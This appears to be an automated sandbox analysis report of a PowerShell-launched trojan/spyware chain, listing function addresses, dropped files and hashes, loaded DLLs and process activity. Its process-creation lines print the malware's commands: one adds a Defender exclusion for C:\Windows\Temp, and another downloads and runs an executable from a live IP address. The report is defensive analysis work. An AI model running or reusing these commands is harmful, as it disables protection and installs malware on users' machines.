              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6ACA1010_2_00007FF75A6ACA10
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6B9F8010_2_00007FF75A6B9F80
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6DD08010_2_00007FF75A6DD080
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6FD05010_2_00007FF75A6FD050
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6EF02010_2_00007FF75A6EF020
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6C20F610_2_00007FF75A6C20F6
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A20B010_2_00007FF75A6A20B0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A69FE2010_2_00007FF75A69FE20
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A712E3C10_2_00007FF75A712E3C
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6D635010_2_00007FF75A6D6350
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F833010_2_00007FF75A6F8330
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A045010_2_00007FF75A6A0450
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70918C10_2_00007FF75A70918C
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F524010_2_00007FF75A6F5240
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6B531010_2_00007FF75A6B5310
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A69F73010_2_00007FF75A69F730
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F686010_2_00007FF75A6F6860
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72B5B010_2_00007FF75A72B5B0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6AD57010_2_00007FF75A6AD570
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6AE61010_2_00007FF75A6AE610
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6FC5CB10_2_00007FF75A6FC5CB
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A73065810_2_00007FF75A730658
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F76A010_2_00007FF75A6F76A0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71BB9010_2_00007FF75A71BB90
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A700D1410_2_00007FF75A700D14
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A726C3010_2_00007FF75A726C30
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6C7CEB10_2_00007FF75A6C7CEB
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A725C5010_2_00007FF75A725C50
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70A92410_2_00007FF75A70A924
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A0A8010_2_00007FF75A6A0A80
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A3A3010_2_00007FF75A6A3A30
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E8B0010_2_00007FF75A6E8B00
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6C1AF010_2_00007FF75A6C1AF0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A716A6810_2_00007FF75A716A68
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6D0AC010_2_00007FF75A6D0AC0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E5AB010_2_00007FF75A6E5AB0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6CBAB010_2_00007FF75A6CBAB0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72FFBC10_2_00007FF75A72FFBC
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6ABF4010_2_00007FF75A6ABF40
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A7130B810_2_00007FF75A7130B8
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70F0D810_2_00007FF75A70F0D8
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6CC0F010_2_00007FF75A6CC0F0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6770E010_2_00007FF75A6770E0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72507010_2_00007FF75A725070
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E4D4010_2_00007FF75A6E4D40
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A708D5010_2_00007FF75A708D50
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6AADD010_2_00007FF75A6AADD0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6CBDD010_2_00007FF75A6CBDD0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A675DB010_2_00007FF75A675DB0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F0E9010_2_00007FF75A6F0E90
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A0E8010_2_00007FF75A6A0E80
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A7E7010_2_00007FF75A6A7E70
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A724E3010_2_00007FF75A724E30
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E5EF010_2_00007FF75A6E5EF0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70539410_2_00007FF75A705394
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71A3C810_2_00007FF75A71A3C8
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6983D010_2_00007FF75A6983D0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E63A610_2_00007FF75A6E63A6
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6CB48010_2_00007FF75A6CB480
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A7114E410_2_00007FF75A7114E4
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6FA43010_2_00007FF75A6FA430
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6CC42010_2_00007FF75A6CC420
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6EB42010_2_00007FF75A6EB420
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A69651010_2_00007FF75A696510
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71A44F10_2_00007FF75A71A44F
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A67618010_2_00007FF75A676180
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70616410_2_00007FF75A706164
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A7171D810_2_00007FF75A7171D8
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70315010_2_00007FF75A703150
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71C12810_2_00007FF75A71C128
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A72716010_2_00007FF75A727160
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70122010_2_00007FF75A701220
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6EE2F010_2_00007FF75A6EE2F0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6E02C010_2_00007FF75A6E02C0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6CB78010_2_00007FF75A6CB780
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6FA78010_2_00007FF75A6FA780
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6D275010_2_00007FF75A6D2750
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70F7E610_2_00007FF75A70F7E6
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6C472010_2_00007FF75A6C4720
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70579C10_2_00007FF75A70579C
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6EC8E010_2_00007FF75A6EC8E0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A98CD10_2_00007FF75A6A98CD
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F654010_2_00007FF75A6F6540
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A69552010_2_00007FF75A695520
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A67661010_2_00007FF75A676610
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70559810_2_00007FF75A705598
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A7136A810_2_00007FF75A7136A8
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A70666C10_2_00007FF75A70666C
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A7146E410_2_00007FF75A7146E4
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A71867410_2_00007FF75A718674
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\Launcher.exe A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\iviewers.dll AA6B0863022BDA1E0C263A75AE2896FE473D3BF57A76EFC258B3AFEC8C157564
              Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\xdnfl52f.civ.exe 1420F60F053C3EA5605239EE431E5F487245108B1C01BE75D16B5246156FA178
              Source: C:\Windows\Temp\Launcher.exeCode function: String function: 0067F3E2 appears 34 times
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: String function: 00007FF75A6B86B0 appears 57 times
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: String function: 00007FF75A708254 appears 34 times
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: String function: 00007FF75A6A6940 appears 41 times
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: String function: 00007FF75A69E1D0 appears 33 times
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: String function: 00007FF75A69BA80 appears 32 times
              Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@13/15@1/3
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6FB9B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,10_2_00007FF75A6FB9B0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6AE610 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6AE610
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067642D CoCreateInstance,GetUserDefaultLCID,StringFromGUID2,wsprintfW,RegOpenKeyW,RegEnumKeyW,RegOpenKeyW,RegQueryValueExW,wsprintfW,RegCloseKey,RegCloseKey,3_2_0067642D
              Source: C:\Windows\Temp\Launcher.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Launcher.exe.logJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1128:120:WilError_03
              Source: C:\Windows\Temp\xdnfl52f.civ.exeMutant created: \Sessions\1\BaseNamedObjects\Mmm-A33C734061CA11EE8C18806E6F6E69637D5C9A18
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nhbgshs.0ep.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: script.ps1Virustotal: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\Launcher.exe "C:\Windows\Temp\Launcher.exe"
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\Temp\xdnfl52f.civ.exe "C:\Windows\Temp\xdnfl52f.civ.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\Launcher.exe "C:\Windows\Temp\Launcher.exe" Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'"Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\Temp\xdnfl52f.civ.exe "C:\Windows\Temp\xdnfl52f.civ.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: aclui.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: ntdsapi.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
